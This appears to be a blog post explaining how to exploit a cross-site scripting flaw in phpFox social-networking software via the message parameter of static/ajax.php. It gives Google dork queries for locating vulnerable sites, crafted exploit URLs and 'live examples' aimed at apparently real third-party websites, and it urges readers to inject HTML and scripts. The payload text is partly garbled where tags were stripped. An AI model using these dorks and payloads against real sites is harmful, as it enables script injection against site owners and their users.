PhpFox is a Php Script For Making Social
Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are
vulnerable For XSS.
Google Dork :
"intext:© · English (US) Powered By phpFox
Version 3.0.1."
"inurl:/static/ajax.php?core"
Open any website for search results with
text :© · English (US) Powered By phpFox
Version 3.0.1
or url xyz.com/static /ajax.php?core
now You'll Get something Like This URL give
below
http://www.ursite.com/static /
ajax.php?core[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
some message
here&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
Now Chnage the Text &Message= blah blah
blah.... (you have to replace the red text with
your html Tags)
for example
http://www.ursite.com/static /
ajax.php?core[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
www.ursite.com
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
You can use multiple html Tags, and scripts
here For details Check This Post
Live examples :
http://onlinesocial.in/static /ajax.php?core
[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
http://www.marshable.net /static/ajax.php?
core[ajax]=true&core
[call]=core.message&core
[security_token]=860eb6a699d5d9f375b5e8
cf0021c094&height=150&message=
XSS
www.ursite.com
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
http://www.marshable.net /static/ajax.php?
core[ajax]=true&core
[call]=core.message&core
[security_token]=860eb6a699d5d9f375b5e8
cf0021c094&height=150&message=XSS
www.ursite.com
No comments:
Post a Comment